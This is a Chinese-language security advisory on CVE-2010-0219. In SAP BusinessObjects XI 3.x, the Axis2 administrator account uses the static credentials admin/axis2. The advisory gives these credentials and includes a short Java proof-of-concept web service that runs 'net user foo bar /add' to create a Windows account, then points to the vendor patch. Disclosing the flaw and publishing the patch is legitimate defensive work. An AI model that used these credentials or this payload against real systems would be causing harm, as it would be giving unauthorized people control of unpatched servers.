发布日期：2010-10-13
更新日期：2010-10-20

受影响系统：

SAP BusinessObjects XI 3.x

描述：

---

BUGTRAQ  ID: 44055
CVE ID: CVE-2010-0219

SAP BusinessObjects是一款商务智能软件和企业绩效解决方案。

SAP BusinessObjects产品中所包含的dswsbobje.war模块所部署的Axis2管理员账号配置了静态的口令，任何可以访问Axis2端口的用户都可以获得对机器的完全访问。

如果要利用这个漏洞，攻击者要上传恶意的Web服务并重启Tomcat例程。该漏洞还适用于其他嵌入了Axis2组件的产品。用户名为admin，口令为axis2，这也是单机版Axis2安装的默认凭据。

<*来源：Joshua Abraham
  
  链接：http://secunia.com/advisories/41799/
        http://marc.info/?l=bugtraq&m=128706933730112&w=2
        http://www.kb.cert.org/vuls/id/989719
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

package org.apache.axis2.axis2userguide; import java.io.IOException;
public class AddUser {
    public AddUser() {
        Process process;
        try {
            process = Runtime.getRuntime().exec("net user foo bar /add");
        }
        catch(IOException ioexception) {
            ioexception.printStackTrace();
        }
    }
    public void main() {
        return;
    }
}

建议：

---

厂商补丁：

SAP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://service.sap.com/sap/support/notes/1432881

浏览次数：3313
严重程度：0（网友投票）